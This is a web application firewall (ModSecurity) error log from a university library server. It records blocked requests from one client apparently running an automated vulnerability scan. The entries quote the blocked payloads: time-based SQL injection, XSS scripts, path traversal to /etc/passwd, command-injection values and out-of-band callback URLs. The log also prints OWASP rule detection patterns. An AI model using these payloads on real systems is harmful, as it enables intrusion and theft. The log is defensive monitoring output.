[Tue Aug 29 11:40:44.622078 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:fname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:fname: test\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/Solar_Image.php"] [unique_id "ZO12zMCo-f0AAAcYU4oAAAAp"]
[Tue Aug 29 11:40:46.390905 2023] [:error] [pid 1807] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:ipdm. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:ipdm: 2;id;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/dgn/dgn_tools/ping.php"] [unique_id "ZO12zsCo-f0AAAcPiz4AAAAa"]
[Tue Aug 29 11:40:50.367275 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filepath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c found within ARGS:filepath: ..\\x5c..\\x5cWindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/fosagent/repl/download-file"] [unique_id "ZO120sCo-f0AAAcYU5MAAAAp"]
[Tue Aug 29 11:40:50.390893 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/admin/asign-single-student-subjects.php"] [unique_id "ZO120sCo-f0AAAaZ9j4AAAAo"]
[Tue Aug 29 11:40:53.633233 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:name: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cWindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/fosagent/repl/download-snapshot"] [unique_id "ZO121cCo-f0AAActbEgAAAAH"]
[Tue Aug 29 11:40:55.440192 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dbPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:dbPath: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/chat/imController/showOrDownByurl.do"] [unique_id "ZO1218Co-f0AAAcvBbAAAAAJ"]
[Tue Aug 29 11:40:58.355795 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/admin/"] [unique_id "ZO122sCo-f0AAAYf-K8AAAAD"]
[Tue Aug 29 11:40:58.367714 2023] [:error] [pid 1827] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:log. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:log: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/webadmin/reporter/view_server_log.php"] [unique_id "ZO122sCo-f0AAAcjAloAAAAw"]
[Tue Aug 29 11:40:58.460341 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:pl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:pl: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php"] [unique_id "ZO122sCo-f0AAAcqJGUAAAAG"]
[Tue Aug 29 11:40:59.382869 2023] [:error] [pid 1841] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gj99psw79gwmeg.oast.site found within TX:1: cjmnbitjmimt14dgn26gj99psw79gwmeg.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/DnnImageHandler.ashx"] [unique_id "ZO1228Co-f0AAAcxbCQAAAAL"]
[Tue Aug 29 11:40:59.402957 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:pl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:pl: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/mail-masta/inc/lists/csvexport.php"] [unique_id "ZO1228Co-f0AAAcsLCgAAAAE"]
[Tue Aug 29 11:41:00.360293 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/photoalbum/index.php"] [unique_id "ZO123MCo-f0AAAcYU7QAAAAp"]
[Tue Aug 29 11:41:00.427869 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:content: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/default/en_US/frame.html"] [unique_id "ZO123MCo-f0AAAcbSB0AAAAv"]
[Tue Aug 29 11:41:00.445979 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file_name: ../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/webui/"] [unique_id "ZO123MCo-f0AAAcvBc4AAAAJ"]
[Tue Aug 29 11:41:01.548687 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sidebar. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:sidebar: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/default/en_US/frame.A100.html"] [unique_id "ZO123cCo-f0AAAaZ9l0AAAAo"]
[Tue Aug 29 11:41:01.549753 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:UPusername. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:UPusername: \\x22><script>javascript:alert(document.cookie)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/MUP/"] [unique_id "ZO123cCo-f0AAAYf-MAAAAAD"]
[Tue Aug 29 11:41:01.566666 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO123cCo-f0AAAcsLDEAAAAE"]
[Tue Aug 29 11:41:03.562226 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/searchblox/servlet/FileServlet"] [unique_id "ZO1238Co-f0AAAcvBd0AAAAJ"]
[Tue Aug 29 11:41:03.563373 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:firstname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:firstname: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO1238Co-f0AAAcsLD0AAAAE"]
[Tue Aug 29 11:41:04.363083 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:userPage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:userPage: javascript:alert(1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "digilib.unla.ac.id"] [uri "/CFIDE/debug/cf_debugFr.cfm"] [unique_id "ZO124MCo-f0AAAcsLEEAAAAE"]
[Tue Aug 29 11:41:04.432263 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cat_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cat_id: ${system(cat/etc/passwd)}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/infusions/downloads/downloads.php"] [unique_id "ZO124MCo-f0AAAcoNO0AAAAF"]
[Tue Aug 29 11:41:05.381031 2023] [:error] [pid 1838] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:s_Language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:s_Language: ../../../../../../../../../../../../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/language/lang"] [unique_id "ZO124cCo-f0AAAcuUm8AAAAI"]
[Tue Aug 29 11:41:05.403259 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/catalog.php"] [unique_id "ZO124cCo-f0AAAcoNPMAAAAF"]
[Tue Aug 29 11:41:05.424074 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:userPage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:userPage: javascript:alert(1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "digilib.unla.ac.id"] [uri "/cfusion/debug/cf_debugFr.cfm"] [unique_id "ZO124cCo-f0AAAcqJH8AAAAG"]
[Tue Aug 29 11:41:05.511640 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{"Type":"SubscriptionConfirmation","Message":"","SubscribeURL":"https://rfi.nessus.org/rfi.txt"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS_NAMES:{\\x22Type\\x22:\\x22SubscriptionConfirmation\\x22,\\x22Message\\x22:\\x22\\x22,\\x22SubscribeURL\\x22:\\x22https://rfi.nessus.org/rfi.txt\\x22}: {\\x22Type\\x22:\\x22SubscriptionConfirmation\\x22,\\x22Message\\x22:\\x22\\x22,\\x22SubscribeURL\\x22:\\x22https://rfi.nessus.org/rfi.txt\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/w3-total-cache/pub/sns.php"] [unique_id "ZO124cCo-f0AAActbHkAAAAH"]
[Tue Aug 29 11:41:08.319768 2023] [:error] [pid 1843] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:wp_abspath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:wp_abspath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/simple-fields/simple_fields.php"] [unique_id "ZO125MCo-f0AAAczXcoAAAAL"]
[Tue Aug 29 11:41:09.287103 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:sponsor. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:sponsor: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.dhtml"] [unique_id "ZO125cCo-f0AAAc4Ei8AAAAP"]
[Tue Aug 29 11:41:09.405472 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:controller: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO125cCo-f0AAAcYVAcAAAAp"]
[Tue Aug 29 11:41:10.373331 2023] [:error] [pid 1846] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:email: 2UdyWmaXpTq91nUrOZ0geHP3XoU@test.com' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO125sCo-f0AAAc2dO8AAAAN"]
